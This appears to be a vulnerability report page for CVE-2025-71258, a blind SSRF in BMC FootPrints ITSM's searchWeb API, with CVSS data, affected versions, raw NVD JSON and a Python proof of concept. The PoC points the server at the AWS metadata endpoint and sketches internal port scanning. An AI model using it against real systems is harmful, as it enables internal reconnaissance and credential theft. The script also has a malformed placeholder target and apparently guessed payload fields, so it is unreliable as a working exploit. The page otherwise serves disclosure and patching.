Security Vulnerability Report
CVE-2025-71258 CVSS 4.3 MEDIUM

CVE-2025-71258

Published: 2026-03-19 14:16:13
Last Modified: 2026-04-22 17:25:06

Description

BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the searchWeb API component that allows authenticated attackers to cause the server to initiate arbitrary outbound requests. Attackers can exploit improper URL validation to perform internal network scanning or interact with internal services, impacting system availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:* - VULNERABLE
BMC FootPrints ITSM 20.20.02
BMC FootPrints ITSM 20.20.03
BMC FootPrints ITSM 20.21.01
BMC FootPrints ITSM 20.21.02
BMC FootPrints ITSM 20.22.01
BMC FootPrints ITSM 20.23.01
BMC FootPrints ITSM 20.24.01
BMC FootPrints ITSM 20.20.02 through 20.24.01.001

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
import time

import requests

target = "https://vulnerable-server/ searchWeb endpoint"

# Blind SSRF PoC - check internal metadata service
# This PoC demonstrates how an attacker can cause the server to make arbitrary requests


def exploit_ssrf(target_url, attacker_callback):
    """
    PoC for CVE-2025-71258 - BMC FootPrints ITSM Blind SSRF

    This demonstrates sending a crafted request to the searchWeb API
    that causes the server to initiate an outbound request to an arbitrary URL.

    Note: In a real attack, the attacker would use time-based detection
    or an external server to log the requests.
    """
    # Malicious payload targeting internal metadata service
    payload = {
        "searchQuery": "test",
        "url": "http://169.254.169.254/latest/meta-data/"  # AWS metadata endpoint
    }

    # Alternative: Internal port scanning
    # payload = {
    #     "searchQuery": "test",
    #     "url": "http://internal-server:port/path"
    # }

    # Time-based detection for blind SSRF: the clock starts before the request is sent
    start_time = time.time()
    try:
        response = requests.post(target_url, json=payload, timeout=10)

        # If the request takes longer, the port might be open
        # (connect timeout vs read timeout behavior)
        return {
            "status": response.status_code,
            "response_time": time.time() - start_time
        }
    except requests.exceptions.Timeout:
        # Timeout may indicate the request was made but no response
        return {"status": "timeout", "note": "Potential SSRF detected"}
    except Exception as e:
        return {"error": str(e)}
```

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-71258", "sourceIdentifier": "[email protected]", "published": "2026-03-19T14:16:13.180", "lastModified": "2026-04-22T17:25:06.440", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "BMC FootPrints ITSM versions 20.20.02 through 20.24.01.001 contain a blind server-side request forgery vulnerability in the searchWeb API component that allows authenticated attackers to cause the server to initiate arbitrary outbound requests. Attackers can exploit improper URL validation to perform internal network scanning or interact with internal services, impacting system availability. The following hotfixes remediate the vulnerability: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002, and 20.24.01."}, {"lang": "es", "value": "Las versiones 20.20.02 a 20.24.01.001 de BMC FootPrints ITSM contienen una vulnerabilidad de falsificación de petición del lado del servidor ciega en el componente API searchWeb que permite a atacantes autenticados hacer que el servidor inicie peticiones salientes arbitrarias. Los atacantes pueden explotar una validación de URL incorrecta para realizar escaneo de red interno o interactuar con servicios internos, afectando la disponibilidad del sistema. 
Los siguientes hotfixes remedian la vulnerabilidad: 20.20.02, 20.20.03.002, 20.21.01.001, 20.21.02.002, 20.22.01, 20.22.01.001, 20.23.01, 20.23.01.002 y 20.24.01."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "NONE", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", 
"privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-918"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:bmc:footprints_itsm:*:*:*:*:*:*:*:*", "versionStartIncluding": "20.20.02", "versionEndIncluding": "20.24.01.001", "matchCriteriaId": "847E5686-7CB0-4A4F-952D-E3D9D2CF7BE8"}]}]}], "references": [{"url": "https://docs.bmc.com/xwiki/bin/view/More-Products/Footprints/FootPrints/fp2024/Release-notes/2024-Release-01-Patch-2/", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://labs.watchtowr.com/thanks-itsms-threat-actors-have-never-been-so-organized-bmc-footprints-pre-auth-remote-code-execution-chains/", "source": "[email protected]", "tags": ["Exploit", "Third Party Advisory"]}, {"url": "https://www.vulncheck.com/advisories/bmc-footprints-itsm-blind-ssrf-in-searchweb", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}